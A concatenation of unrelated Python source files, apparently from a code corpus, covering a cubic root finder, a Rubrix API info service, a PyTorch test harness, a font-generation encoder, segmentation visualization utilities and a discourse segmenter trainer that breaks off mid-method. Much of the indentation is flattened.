print("Valeur de f(p0): ", calculerFxPolynome3dg(p0, a, b, c, d))
        # Approximate the solution f(x) = 0 for x > x2
# ----------------------------------------------------
        # find a point x0 above x2 such that f(x0) has the opposite sign of f(x2)
x0 = x2 + 1
while compareSign(calculerFxPolynome3dg(x0, a, b, c, d), calculerFxPolynome3dg(x2, a, b, c, d)):
x0 = x0 + 1
print(
"Valeur de x0 de sorte que f(x0) et f(x2) soient de signe opposé avec x > x2 : ", x0)
print("Valeur de f(x0) ", calculerFxPolynome3dg(x0, a, b, c, d))
        print("Valeur de f(x2) ", calculerFxPolynome3dg(x2, a, b, c, d))
p0 = trouverFxEgal0(x0, x2, a, b, c, d)
print(
"Valeur approchant p0 de x pour f(x) = 0 et x > x2 après n itérations : ", p0)
print("Valeur de f(p0): ", calculerFxPolynome3dg(p0, a, b, c, d))
    else: # the extrema have the same sign
print("Cas ou f1 et f2 sont de même signes. Il n'y a donc pas de solution f(x) = 0 pour x compris entre x1 et x2")
if compareSign(f1, A):
print(
"f1 et A sont de même signe. Donc, il existe une solution x telle que f(x)=0 pour x < x1")
            # Approximate the solution f(x) = 0 for x < x1
# ----------------------------------------------------
            # find a point x0 below x1 such that f(x0) has the opposite sign of f(x1)
x0 = x1 - 1
while compareSign(calculerFxPolynome3dg(x0, a, b, c, d), calculerFxPolynome3dg(x1, a, b, c, d)):
x0 = x0 - 1
print(
"Valeur de x0 de sorte que f(x0) et f(x1) soient de signe opposé avec x < x1 : ", x0)
print("Valeur de f(x0) ", calculerFxPolynome3dg(x0, a, b, c, d))
print("Valeur de f(x1) ", calculerFxPolynome3dg(x1, a, b, c, d))
p0 = trouverFxEgal0(x0, x1, a, b, c, d)
print(
"Valeur approchant p0 de x pour f(x) = 0 et x < x1 après n itérations : ", p0)
print("Valeur de f(p0): ", calculerFxPolynome3dg(p0, a, b, c, d))
else:
print(
"f1 et A sont de signe opposé. Donc, il existe une solution x telle que f(x)=0 pour x > x2")
            # Approximate the solution f(x) = 0 for x > x2
# ----------------------------------------------------
            # find a point x0 above x2 such that f(x0) has the opposite sign of f(x2)
x0 = x2 + 1
while compareSign(calculerFxPolynome3dg(x0, a, b, c, d), calculerFxPolynome3dg(x2, a, b, c, d)):
x0 = x0 + 1
print(
"Valeur de x0 de sorte que f(x0) et f(x2) soient de signe opposé avec x > x2 : ", x0)
print("Valeur de f(x0) ", calculerFxPolynome3dg(x0, a, b, c, d))
            print("Valeur de f(x2) ", calculerFxPolynome3dg(x2, a, b, c, d))
p0 = trouverFxEgal0(x0, x2, a, b, c, d)
print(
"Valeur approchant p0 de x pour f(x) = 0 et x > x2 après n itérations : ", p0)
print("Valeur de f(p0): ", calculerFxPolynome3dg(p0, a, b, c, d))
else: # Delta is zero or negative
if delta == 0:
print("Delta de f' est nul donc il y a 1 solution unique")
print("x0 =", result[0])
        # Determine the variations of f according to the value of Delta and the sign of A
if A > 0:
print("Delta de f' est null et A est postif donc f est toujours croissante")
        else: # A is negative
print(
"Delta de f' est null et A est négatif donc f est toujours décroissante")
else:
print("Pas de solution dans l'espace des réel pour f'(x)=0")
        # Determine the variations of f according to the value of Delta and the sign of A
if A > 0:
print(
"Delta de f' est négatif et A est postif donc f est toujours croissante")
        else: # A is negative
print(
"Delta de f' est négatif et A est négatif donc f est toujours décroissante")
    # Find a value of x such that f(0) and f(x) have opposite signs.
    # To do this, compare the signs of A and d to determine whether the x with f(x)=0 is positive or negative
if compareSign(A, d):
        # Approximate the solution f(x) = 0 for x < 0
# ----------------------------------------------------
        # find a point x0 below 0 such that f(x0) has the opposite sign of d
x0 = - 1
while compareSign(calculerFxPolynome3dg(x0, a, b, c, d), d):
x0 = x0 - 1
print(
"Valeur de x0 de sorte que f(x0) et d soient de signe opposé avec x < 0 : ", x0)
print("Valeur de f(x0) ", calculerFxPolynome3dg(x0, a, b, c, d))
p0 = trouverFxEgal0(x0, 0, a, b, c, d)
print(
"Valeur approchant p0 de x pour f(x) = 0 et x < 0 après n itérations : ", p0)
print("Valeur de f(p0): ", calculerFxPolynome3dg(p0, a, b, c, d))
else:
        # Approximate the solution f(x) = 0 for x > 0
# ------------------------------------------
        # find a point x0 above 0 such that f(x0) has the opposite sign of d
x0 = 1
while compareSign(calculerFxPolynome3dg(x0, a, b, c, d), d):
x0 = x0 + 1
print(
"Valeur de x0 de sorte que f(x0) et d soient de signe opposé avec x > 0 : ", x0)
print("Valeur de f(x0) ", calculerFxPolynome3dg(x0, a, b, c, d))
p0 = trouverFxEgal0(x0, 0, a, b, c, d)
print(
"Valeur approchant p0 de x pour f(x) = 0 et x > 0 après n itérations : ", p0)
print("Valeur de f(p0): ", calculerFxPolynome3dg(p0, a, b, c, d))
|
py | 1a32fc55aaf6cb394143e3536fb969c774cc620b | # coding=utf-8
# Copyright 2021-present, the Recognai S.L. team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
from typing import Any, Dict, Optional
import psutil
from fastapi import Depends
from hurry.filesize import size
from rubrix import __version__ as rubrix_version
from ..commons.es_wrapper import ElasticsearchWrapper
from .model import ApiStatus
class ApiInfoService:
"""
The api info service
"""
def __init__(self, es: ElasticsearchWrapper):
self.__es__ = es
def api_status(self) -> ApiStatus:
"""Returns the current api status"""
return ApiStatus(
rubrix_version=str(rubrix_version),
elasticsearch=self._elasticsearch_info(),
mem_info=self._api_memory_info(),
)
def _elasticsearch_info(self) -> Dict[str, Any]:
"""Returns the elasticsearch cluster info"""
return self.__es__.get_cluster_info()
@staticmethod
def _api_memory_info() -> Dict[str, Any]:
"""Fetch the api process memory usage"""
process = psutil.Process(os.getpid())
return {k: size(v) for k, v in process.memory_info()._asdict().items()}
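        # Illustrative shape of the returned dict (values depend on the platform and process):
        #   {'rss': '120M', 'vms': '1G', 'shared': '30M', ...}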
_instance: Optional[ApiInfoService] = None
def create_info_service(
es_wrapper: ElasticsearchWrapper = Depends(ElasticsearchWrapper.get_instance),
) -> ApiInfoService:
"""
Creates an api info service
"""
global _instance
if not _instance:
_instance = ApiInfoService(es_wrapper)
return _instance
|
py | 1a32fc92ddf91e29367bf9c2e1d143b6edcd87b2 | import torch
import os
import configs
import datasets
import models
class BaseTest(object):
def __init__(self, model):
self.model = model
def run(self):
for model_cfg in models.allcfgs():
if hasattr(model_cfg, 'name') and model_cfg.name == self.model.__name__:
model_name = os.path.splitext(os.path.split(model_cfg._path)[1])[0]
print('Testing model: ' + model_name + ' ...')
for data_cfg in datasets.allcfgs():
if not self.model.check_cfg(data_cfg, model_cfg):
continue
data_name = os.path.splitext(os.path.split(data_cfg._path)[1])[0]
print('\tTesting dataset: ' + data_name + ' ...')
data_cfg.index_cross = 1
sample_dict = dict()
for name, value in vars(data_cfg).items():
if name.startswith('source') or name.startswith('target'):
kernel = getattr(data_cfg, 'kernel' if name.startswith('source') else 'out_kernel', None)
if kernel is not None:
sample_shape = (kernel.kT, kernel.kW, kernel.kH)
sample_dict[name] = torch.randn(configs.env.ci.batchsize, *sample_shape)
else:
sample_shape = (value.time, value.width, value.height) \
if hasattr(value, 'time') else [value.elements]
sample_dict[name] = torch.randint(value.classes, (configs.env.ci.batchsize, 1)).long() \
if len(sample_shape) == 1 and sample_shape[0] == 1 \
else torch.randn(configs.env.ci.batchsize, *sample_shape)
print("\t-- " + name + " size: ", end="")
print(sample_dict[name].size())
for run_cfg in configs.Run.all():
run_name = os.path.splitext(os.path.split(run_cfg._path)[1])[0]
print('\t\tTesting config: ' + run_name + ' ...')
model = self.model(model_cfg, data_cfg, run_cfg)
params, params_all = dict(), 0
for name, value in model.modules().items():
params[name] = sum(p.numel() for p in value.parameters() if p.requires_grad)
params_all += params[name]
print("\t\t-- parameter(s): ", end="")
print(params)
print("\t\t-- all parameters: ", end="")
print(params_all)
loss_dict = model.train(0, sample_dict)
print("\t\t-- loss(es): ", end="")
print(loss_dict)
result_dict = model.test(0, sample_dict)
for name, value in result_dict.items():
result_dict[name] = value.shape
print("\t\t-- result(s) size: ", end="")
print(result_dict)
print("\t\t-- save folder: ", end="")
print(model.getpath())
save_folder = os.path.join("test", model_name, data_name + '-' + run_name)
model.save(epoch=0, path=save_folder)
model.load(path=save_folder)
print('')
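# Typical usage (MyModel is a hypothetical model class): BaseTest(MyModel).run() walks every model
# config whose name matches MyModel.__name__, every compatible dataset config and every run config,
# builds random sample batches of size configs.env.ci.batchsize and exercises train/test/save/load.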
|
py | 1a32fd16b6aef4b749aba5d84cfb89c2df077906 | """
LF-Font
Copyright (c) 2020-present NAVER Corp.
MIT license
"""
from functools import partial
import torch.nn as nn
import torch
from base.modules import ConvBlock, ResBlock, GCBlock, CBAM
class ComponentConditionBlock(nn.Module):
def __init__(self, in_shape, n_comps):
super().__init__()
self.in_shape = in_shape
self.bias = nn.Parameter(torch.zeros(n_comps, in_shape[0], 1, 1), requires_grad=True)
def forward(self, x, comp_id=None):
out = x
if comp_id is not None:
b = self.bias[comp_id]
out += b
return out
class ComponentEncoder(nn.Module):
def __init__(self, n_comps):
super().__init__()
ConvBlk = partial(ConvBlock, norm="in", activ="relu", pad_type="zero")
ResBlk = partial(ResBlock, norm="in", activ="relu", pad_type="zero", scale_var=False)
C = 32
self.layers = nn.ModuleList([
ConvBlk(1, C, 3, 1, 1, norm='none', activ='none'), # 128x128
ConvBlk(C*1, C*2, 3, 1, 1, downsample=True), # 64x64
GCBlock(C*2),
ConvBlk(C*2, C*4, 3, 1, 1, downsample=True), # 32x32
CBAM(C*4),
ComponentConditionBlock((128, 32, 32), n_comps),
ResBlk(C*4, C*4, 3, 1),
CBAM(C*4),
ResBlk(C*4, C*4, 3, 1),
ResBlk(C*4, C*8, 3, 1, downsample=True), # 16x16
CBAM(C*8),
ResBlk(C*8, C*8)
])
self.skip_layer_idx = 8
self.feat_shape = {"last": (C*8, 16, 16), "skip": (C*4, 32, 32)}
def forward(self, x, *comp_id):
x = x.repeat((1, 1, 1, 1))
ret_feats = {}
for lidx, layer in enumerate(self.layers):
if isinstance(layer, ComponentConditionBlock):
x = layer(x, *comp_id)
else:
x = layer(x)
if lidx == self.skip_layer_idx:
ret_feats["skip"] = x
ret_feats["last"] = x
ret_feats = {k: nn.Sigmoid()(v) for k, v in ret_feats.items()}
return ret_feats
def get_feat_shape(self):
return self.feat_shape
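    # Shape walk-through (assuming a 1x128x128 input of batch size B): 128x128 -> 64x64 -> 32x32
    # gives the "skip" feature (B, 128, 32, 32) at layer index 8, and a further downsample to
    # 16x16 gives the "last" feature (B, 256, 16, 16), matching self.feat_shape with C = 32.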
|
py | 1a32fd47125e4ef9677d4ef7216abce0b9236583 | import logging
import math
import re
import warnings
from pathlib import Path
import numpy as np
import torch
import torch.nn.functional as F
from PIL import Image
from matplotlib import pyplot as plt, gridspec, cm, colors
import csv
from utils.utils import unscale, unnormalize, get_key_def
from utils.geoutils import create_new_raster_from_base
import matplotlib
matplotlib.use('Agg')
logging.getLogger(__name__)
def grid_vis(input_, output, heatmaps_dict, label=None, heatmaps=True):
""" Create a grid with PIL images and titles
:param input_: (tensor) input array as pytorch tensor, e.g. as returned by dataloader
:param output: (tensor) output array as pytorch tensor, e.g. as returned by dataloader
    :param heatmaps_dict: (dict) Dictionary of heatmaps where key is the grayscale value of the class and value is a dict {'class_name': (str), 'heatmap_PIL': (PIL object)}
:param label: (tensor) label array as pytorch tensor, e.g. as returned by dataloader (optional)
:param heatmaps: (bool) if True, include heatmaps in grid
:return: Saves .png to disk
"""
list_imgs_pil = [input_, label, output] if label is not None else [input_, output]
list_titles = ['input', 'label', 'output'] if label is not None else ['input', 'output']
num_tiles = (len(list_imgs_pil) + len(heatmaps_dict))
height = math.ceil(num_tiles/4)
width = num_tiles if num_tiles < 4 else 4
plt.figure(figsize=(width*6, height*6))
grid_spec = gridspec.GridSpec(height, width)
if heatmaps:
for key in heatmaps_dict.keys():
list_imgs_pil.append(heatmaps_dict[key]['heatmap_PIL'])
list_titles.append(heatmaps_dict[key]['class_name'])
assert len(list_imgs_pil) == len(list_titles)
for index, zipped in enumerate(zip(list_imgs_pil, list_titles)):
img, title = zipped
plt.subplot(grid_spec[index])
plt.imshow(img)
plt.grid(False)
plt.axis('off')
plt.title(title)
plt.tight_layout()
return plt
def vis_from_batch(vis_params,
inputs,
outputs,
batch_index,
vis_path,
labels=None,
dataset='',
ep_num=0,
scale=None,
debug=False):
""" Provide indiviual input, output and label from batch to visualization function
:param vis_params: (Dict) parameters useful during visualization
:param inputs: (tensor) inputs as pytorch tensors with dimensions (batch_size, channels, width, height)
:param outputs: (tensor) outputs as pytorch tensors with dimensions (batch_size, channels, width, height)
:param batch_index: (int) index of batch inside epoch
:param vis_path: path where visualisation images will be saved
:param labels: (tensor) labels as pytorch tensors with dimensions (batch_size, channels, width, height)
:param dataset: name of dataset for file naming purposes (ex. 'tst')
:param ep_num: (int) number of epoch for file naming purposes
:param debug: (bool) if True, some debug features will be activated
:return:
"""
    labels = [None]*(len(outputs)) if labels is None else labels # Create empty list of labels to enable zip operation below if no label
for batch_samp_index, zipped in enumerate(zip(inputs, labels, outputs)):
epoch_samp_index = batch_samp_index + len(inputs) * batch_index
input_, label, output = zipped
vis(vis_params, input_, output,
vis_path=vis_path,
sample_num=epoch_samp_index+1,
label=label,
dataset=dataset,
ep_num=ep_num,
scale=scale,
debug=debug)
def vis(vis_params,
input_,
output,
vis_path,
sample_num=0,
label=None,
dataset='',
ep_num=0,
inference_input_path=None,
scale=None,
debug=False):
"""saves input, output and label (if given) as .png in a grid or as individual pngs
:param input_: (tensor) input array as pytorch tensor, e.g. as returned by dataloader
:param output: (tensor) output array as pytorch tensor before argmax, e.g. as returned by dataloader
:param vis_path: path where visualisation images will be saved
:param sample_num: index of sample if function is from for loop iterating through a batch or list of images.
:param label: (tensor) label array as pytorch tensor, e.g. as returned by dataloader. Optional.
:param dataset: (str) name of dataset arrays belong to. For file-naming purposes only.
:param ep_num: (int) number of epoch arrays are inputted from. For file-naming purposes only.
:param inference_input_path: (Path) path to input image on which inference is being performed. If given, turns «inference» bool to True below.
:return: saves color images from input arrays as grid or as full scale .png
"""
    # TODO: Temporary fix, needs to be discussed: `input_` is a list if the initial input has NIR with the RGB at [0].
    # The `squeeze` function removes the extra dimension that appears in inference.
input_ = np.squeeze(input_[0]) if type(input_) is list else np.squeeze(input_)
assert vis_path.parent.is_dir()
vis_path.mkdir(exist_ok=True)
single_class_mode = False
if not vis_params[
'inference_input_path']: # FIXME: function parameters should not come in as different types if inference or not.
input_ = input_.cpu().permute(1, 2, 0).numpy() # channels last
if output.shape[0] == 1:
output = torch.sigmoid(output) # use sigmoid for single class
single_class_mode = True
else:
output = F.softmax(output, dim=0) # use softmax for multiclass (note: not applied for inference)
output = output.detach().cpu().permute(1, 2, 0).numpy() # channels last
if label is not None:
label_copy = label.cpu().numpy().copy()
if vis_params['ignore_index'] < 0:
new_ignore_index = 255
# Convert all pixels with ignore_index values to 255 to make sure it is last in order of values.
label_copy[label_copy == vis_params['ignore_index']] = new_ignore_index
if vis_params['mean'] and vis_params['std']:
input_ = unnormalize(input_img=input_, mean=vis_params['mean'], std=vis_params['std'])
input_ = unscale(img=input_, float_range=(scale[0], scale[1]), orig_range=(0, 255)) if scale else input_
mode = 'RGB' # https://pillow.readthedocs.io/en/3.1.x/handbook/concepts.html#concept-modes
if 1 <= input_.shape[2] <= 2:
input_ = np.squeeze(input_[:, :, :1], axis=2) # take first band (will become grayscale image)
mode = 'L'
elif input_.shape[2] >= 3:
input_ = input_[:, :, :3] # take three first bands assuming they are RGB in correct order
input_PIL = Image.fromarray(input_.astype(np.uint8), mode=mode) # TODO: test this with grayscale input.
# Give value of class to band with highest value in final inference
if single_class_mode:
output_acv = np.squeeze(output, axis=2).astype(np.uint8)
else:
output_acv = np.argmax(output, axis=2).astype(np.uint8) # Flatten along channels axis. Convert to 8bit
# Define colormap and names of classes with respect to grayscale values
classes, cmap = colormap_reader(output, vis_params['colormap_file'], default_colormap='Set1')
heatmaps_dict = heatmaps_to_dict(output, classes, inference=inference_input_path,
debug=debug) # Prepare heatmaps from softmax output
# Convert output and label, if provided, to RGB with matplotlib's colormap object
output_acv_color = cmap(output_acv)
output_acv_PIL = Image.fromarray((output_acv_color[:, :, :3] * 255).astype(np.uint8), mode='RGB')
if not inference_input_path and label is not None:
label_color = cmap(label_copy)
label_PIL = Image.fromarray((label_color[:, :, :3] * 255).astype(np.uint8), mode='RGB')
else:
label_PIL = None
if inference_input_path is not None:
if debug and len(np.unique(output_acv)) == 1:
warnings.warn(f'Inference contains only {np.unique(output_acv)} value. Make sure data scale '
f'{scale} is identical with scale used for training model.')
output_name = vis_path.joinpath(f"{inference_input_path.stem}_inference.tif")
create_new_raster_from_base(inference_input_path, output_name, output_acv)
if vis_params['heatmaps_inf']:
for key in heatmaps_dict.keys():
heatmap = np.array(heatmaps_dict[key]['heatmap_PIL'])
class_name = heatmaps_dict[key]['class_name']
heatmap_name = vis_path.joinpath(f"{inference_input_path.stem}_inference_heatmap_{class_name}.tif")
create_new_raster_from_base(inference_input_path, heatmap_name, heatmap)
elif vis_params['grid']: # SAVE PIL IMAGES AS GRID
grid = grid_vis(input_PIL, output_acv_PIL, heatmaps_dict, label=label_PIL, heatmaps=vis_params['heatmaps'])
grid.savefig(vis_path.joinpath(f'{dataset}_{sample_num:03d}_ep{ep_num:03d}.png'))
plt.close()
else: # SAVE PIL IMAGES DIRECTLY TO FILE
if not vis_path.joinpath(f'{dataset}_{sample_num:03d}_satimg.jpg').is_file():
input_PIL.save(vis_path.joinpath(f'{dataset}_{sample_num:03d}_satimg.jpg'))
if not inference_input_path and label is not None:
label_PIL.save(vis_path.joinpath(f'{dataset}_{sample_num:03d}_label.png')) # save label
output_acv_PIL.save(vis_path.joinpath(f'{dataset}_{sample_num:03d}_output_ep{ep_num:03d}.png'))
if vis_params['heatmaps']: # TODO: test this.
for key in heatmaps_dict.keys():
heatmap = heatmaps_dict[key]['heatmap_PIL']
class_name = heatmaps_dict[key]['class_name']
heatmap.save(vis_path.joinpath(f"{dataset}_{sample_num:03d}_output_ep{ep_num:03d}_heatmap_{class_name}.png")) # save heatmap
def heatmaps_to_dict(output, classes=None, inference=False, debug=False):
    '''Store per-class heatmaps into a dictionary
    :param output: channels-last softmax (or sigmoid) output as a numpy array
    :param classes: class names used to label each heatmap; defaults to the channel indices
    :param inference: if truthy, keep heatmaps as grayscale rather than applying a colormap
    :param debug: if True, log the unique values of each heatmap
    :return: dictionary keyed by channel index, each value holding the class name and the heatmap as a PIL image
    '''
    heatmaps_dict = {}
    classes = range(output.shape[2]) if not classes else classes
for i in range(output.shape[2]): # for each channel (i.e. class) in output
perclass_output = output[:, :, i]
if inference: # Don't color heatmap if in inference
if debug:
logging.info(f'Heatmap class: {classes[i]}\n')
logging.info(f'List of unique values in heatmap: {np.unique(np.uint8(perclass_output * 255))}\n')
perclass_output_PIL = Image.fromarray(np.uint8(perclass_output*255))
else: # https://stackoverflow.com/questions/10965417/how-to-convert-numpy-array-to-pil-image-applying-matplotlib-colormap
perclass_output_PIL = Image.fromarray(np.uint8(cm.get_cmap('inferno')(perclass_output) * 255))
heatmaps_dict[i] = {'class_name': classes[i], 'heatmap_PIL': perclass_output_PIL}
return heatmaps_dict
def colormap_reader(output, colormap_path=None, default_colormap='Set1'):
"""
    :param output: channels-last model output; only used to determine the number of classes
    :param colormap_path: csv file (with header) containing 3 columns: input grayscale value, class name, html color (#RRGGBB)
    :param default_colormap: name of the matplotlib colormap to fall back on when no csv file is given
    :return: list of class names and a matplotlib colormap mapping grayscale values to colors
"""
if colormap_path is not None:
assert Path(colormap_path).is_file(), f'Could not locate {colormap_path}'
input_val = []
classes_list = ['background']
html_colors = ['#000000']
with open(colormap_path, 'rt') as file:
reader = csv.reader(file)
next(reader) # Skip header
rows = list(reader)
input_val.extend([int(row[0]) for row in rows])
csv_classes = [row[1] for row in rows] # Take second element in row. Should be class name
csv_html_colors = [row[2] for row in rows] # Take third element in row. Should be hex color code
sorted_classes = [x for _, x in sorted(zip(input_val, csv_classes))] # sort according to grayscale values order
sorted_colors = [x for _, x in sorted(zip(input_val, csv_html_colors))]
for color in sorted_colors:
match = re.search(r'^#(?:[0-9a-fA-F]{3}){1,2}$', color)
assert match, f'Submitted color {color} does not match HEX color code pattern'
classes_list.extend(sorted_classes)
html_colors.extend(sorted_colors)
assert len(html_colors) == len(classes_list) >= output.shape[2], f'Not enough colors and class names for number of classes in output'
        html_colors.append('white')  # for ignore_index values in labels. TODO: test this with a label containing ignore_index values
cmap = colors.ListedColormap(html_colors)
else:
classes_list = list(range(0, output.shape[2])) # TODO: since list of classes are only useful for naming each heatmap, this list could be inside the heatmaps_dict, e.g. {1: {heatmap: perclass_output_PIL, class_name: 'roads'}, ...}
cmap = cm.get_cmap(default_colormap)
return classes_list, cmap
|
py | 1a32fffd79b80fc2a5a7e6ce23256163d64efc3b | from graphene_django.views import GraphQLView
from .schema import schema as movie_schema
class MovieView(GraphQLView):
graphiql = True
schema = movie_schema
|
py | 1a3300c0e098310dd9ab219f06c487c17b3e7e01 | """
SubtreeSegmenter.py
A discourse unit segmentation module based on a moving window capturing parts of
a dependency syntax parse.
"""
import io, sys, os, copy
# Allow package level imports in module
script_dir = os.path.dirname(os.path.realpath(__file__))
lib = os.path.abspath(script_dir + os.sep + "..")
models = os.path.abspath(script_dir + os.sep + ".."+os.sep+".."+os.sep + "models")
sys.path.append(lib)
from collections import defaultdict, Counter
from argparse import ArgumentParser
#os.environ['OMP_NUM_THREADS'] = "1"
import numpy as np
import pandas as pd
from sklearn.ensemble import ExtraTreesClassifier, RandomForestClassifier, GradientBoostingClassifier
from sklearn.externals import joblib
from sklearn.preprocessing import LabelEncoder
from sklearn.metrics import confusion_matrix
from sklearn.model_selection import GridSearchCV
from xgboost import XGBClassifier
from conll_reader import read_conll, get_multitrain_preds
from tune import permutation_importances, report_correlations, report_theils_u, get_best_params, get_best_score, hyper_optimize, grid_search
np.random.seed(42)
import random
random.seed(42)
DEFAULTCLF = RandomForestClassifier(random_state=42)
DEFAULTCLF = XGBClassifier(random_state=42, max_depth=50, min_child_weight=1, n_estimators=200, n_jobs=3 , verbose=1,learning_rate=0.16)
DEFAULTPARAMS = {"n_estimators":250,"min_samples_leaf":3,"max_features":10,"random_state":42}
class SubtreeSegmenter:
def __init__(self,lang="eng",model=None,multifolds=5,auto=""):
self.name = "SubtreeSegmenter"
        self.genre_pat = "^(..)" # By default, the first two characters of the docname identify the genre
if "gum" in model:
self.genre_pat = "GUM_([^_]+)_"
self.lang = lang
self.multifolds = multifolds
self.corpus = model
self.auto = auto
if model is not None:
self.model = models + os.sep + model + auto + "_subtreeseg.pkl"
else:
self.model = ".." + os.sep + ".." + os.sep + "models" + os.sep + auto + "subtreeseg.pkl"
self.corpus_dir = None
self.clf = DEFAULTCLF
def read_data(self,infile,size,as_text,rare_thresh,chosen_feats=None):
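        """
        Read a .conll training file and build the encoded training matrix.
        Words below the rare_thresh frequency rank are replaced by their POS tag,
        token features are expanded into skip-gram + parent features via
        traverse_trees/n_gram, and categorical columns are label-encoded.
        Returns the encoded dataframe, the X/y arrays, the categorical and numerical
        feature names, the encoder dictionary, the firsts/lasts lists from read_conll
        and the list of retained frequent words.
        """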
cap = 3*size if size is not None else None
train_feats, vocab, toks, firsts, lasts = read_conll(infile,genre_pat=self.genre_pat,mode="seg",cap=cap,char_bytes=self.lang=="zho",as_text=as_text)
vocab = Counter(vocab)
top_n_words = vocab.most_common(rare_thresh)
top_n_words, _ = zip(*top_n_words)
for tok in train_feats:
if tok["word"] not in top_n_words:
tok["word"] = tok["pos"]
tokens_by_abs_id = self.traverse_trees(train_feats)
data, headers = self.n_gram(train_feats,tokens_by_abs_id)
# Features to use for all n-gram tokens
num_labels = ["head_dist","left_span","right_span","samepar_left","tok_len"]
cat_labels = ["case","closest_left","closest_right","deprel","farthest_left","farthest_right","pos","word","morph","cpos","depchunk"]
pref_cat = []
pref_num = []
for pref in ["mn2","mn1","par","par_par","pl1","pl2"]:
pref_cat += [pref + "_" + h for h in cat_labels]
pref_num += [pref + "_" + h for h in num_labels]
# Features only needed for node token
cat_labels += ["genre"] + pref_cat #+ ["heading_first","heading_last"]#+ ["s_type"]
num_labels += ["dist2end","sent_doc_percentile","tok_id","wid","quote","rank"] + pref_num # + ["bracket"]
num_labels += ["par_quote","par_par_quote"]#,"par_bracket","par_par_bracket"]
# Use specific feature subset
if chosen_feats is not None:
new_cat = []
new_num = []
for feat in chosen_feats:
if feat in cat_labels:
new_cat.append(feat)
elif feat in num_labels:
new_num.append(feat)
cat_labels = new_cat
num_labels = new_num
data = pd.DataFrame(data, columns=headers)
data_encoded, multicol_dict = self.multicol_fit_transform(data, pd.Index(cat_labels))
data_x = data_encoded[cat_labels+num_labels].values
data_y = np.where(data_encoded['label'] == "_", 0, 1)
return data_encoded, data_x, data_y, cat_labels, num_labels, multicol_dict, firsts, lasts, top_n_words
def train(self,training_file,rare_thresh=200,clf_params=None,chosen_feats=None,tune_mode=None,size=None,as_text=True,multitrain=False,chosen_clf=DEFAULTCLF):
"""
:param training_file:
:param rare_thresh:
:param clf_params:
:param chosen_feats: List of feature names to force a subset of selected features to be used
:param tune_mode: None for no grid search, "paramwise" to tune each hyperparameter separately, or "full" for complete grid (best but slowest)
:param size: Sample size to optimize variable importance with
:return:
"""
if tune_mode is not None and size is None:
size = 5000
sys.stderr.write("o No sample size set - setting size to 5000\n")
if clf_params is None:
# Default classifier parameters
clf_params = {"n_estimators":150,"min_samples_leaf":3, "random_state":42}
if DEFAULTCLF.__class__.__name__ not in ["GradientBoostingClassifier","CatBoostClassifier","XGBClassifier"]:
clf_params.update({"n_jobs":4, "oob_score":True, "bootstrap":True})
data_encoded, data_x, data_y, cat_labels, num_labels, multicol_dict, firsts, lasts, top_n_words = self.read_data(training_file,size,as_text=as_text,rare_thresh=rare_thresh,chosen_feats=chosen_feats)
sys.stderr.write("o Learning...\n")
if tune_mode is not None:
# Randomly select |size| samples for training and leave rest for validation, max |size| samples
data_x = data_encoded[cat_labels+num_labels+["label"]].sample(frac=1,random_state=42)
data_y = np.where(data_x['label'] == "_", 0, 1)
data_x = data_x[cat_labels+num_labels]
if len(data_y) > 2*size:
val_x = data_x[size:2*size]
val_y = data_y[size:2*size]
else:
val_x = data_x[size:]
val_y = data_y[size:]
data_x = data_x[:size]
data_y = data_y[:size]
if tune_mode == "importances":
sys.stderr.write("o Measuring correlation of categorical variables\n")
theil_implications = report_theils_u(val_x,cat_labels)
for (var1, var2) in theil_implications:
if var1 in cat_labels and var2 in cat_labels and var2 !="word":
drop_var = var2
u = theil_implications[(var1, var2)]
sys.stderr.write("o Removed feature " + drop_var + " due to Theil's U " + str(u)[:6] + " of " + var1 + "->" + var2 + "\n")
cat_labels.remove(drop_var)
sys.stderr.write("o Measuring correlation of numerical variables\n")
cor_mat = report_correlations(val_x[num_labels],thresh=0.95)
for (var1, var2) in cor_mat:
if var1 in num_labels and var2 in num_labels:
drop_var = var2 # if imp[var1] > imp[var2] else var1
if drop_var == "word":
continue
corr_level = cor_mat[(var1, var2)]
sys.stderr.write("o Removed feature " + drop_var + " due to correlation " + str(corr_level) + " of " + var1 + ":" + var2 + "\n")
num_labels.remove(drop_var)
return cat_labels, num_labels
if tune_mode in ["paramwise","full"]: # Grid Search
best_clf, best_params = grid_search(data_x,data_y,tune_mode,clf_params)
clf_name = best_clf.__class__.__name__
self.clf = best_clf
return best_clf, best_params
elif tune_mode == "hyperopt": # TPE guided random search
from hyperopt import hp
from hyperopt.pyll.base import scope
val_x, val_y = None, None
if self.corpus_dir is not None:
dev_file = self.corpus_dir + os.sep + self.corpus + "_dev.conll"
_, val_x, val_y, _, _, _, _, _, _ = self.read_data(dev_file,size,as_text=False,rare_thresh=rare_thresh,chosen_feats=chosen_feats)
space = {
'n_estimators': scope.int(hp.quniform('n_estimators', 100, 250, 10)),
'max_depth': scope.int(hp.quniform('max_depth', 3, 30, 1)),
'eta': scope.float(hp.quniform('eta', 0.01, 0.2, 0.01)),
'gamma': scope.float(hp.quniform('gamma', 0.01, 0.2, 0.01)),
'colsample_bytree': hp.choice('colsample_bytree', [0.4,0.5,0.6,0.7,1.0]),
'subsample': hp.choice('subsample', [0.5,0.6,0.7,0.8,1.0]),
'clf': hp.choice('clf', ["xgb"])
}
best_clf, best_params = hyper_optimize(data_x.values,data_y,val_x=None,val_y=None,space=space,max_evals=20)
return best_clf, best_params
else: # No hyperparameter optimization
clf = chosen_clf if chosen_clf is not None else DEFAULTCLF
sys.stderr.write("o Setting params " + str(clf_params) + "\n")
clf.set_params(**clf_params)
if clf.__class__.__name__ not in ["GradientBoostingClassifier","CatBoostClassifier","XGBClassifier"]:
clf.set_params(**{"n_jobs":3,"oob_score":True,"bootstrap":True})
if clf.__class__.__name__ in ["XGBClassifier"]:
clf.set_params(**{"n_jobs":3})
clf.set_params(**{"random_state":42})
if multitrain:
multitrain_preds = get_multitrain_preds(clf,data_x,data_y,self.multifolds)
multitrain_preds = "\n".join(multitrain_preds.strip().split("\n")[1:-1]) # Remove OOV tokens at start and end
with io.open(script_dir + os.sep + "multitrain" + os.sep + self.name + self.auto + '_' + self.corpus,'w',newline="\n") as f:
sys.stderr.write("o Serializing multitraining predictions\n")
f.write(multitrain_preds)
if clf.__class__.__name__ == "CatBoostClassifier":
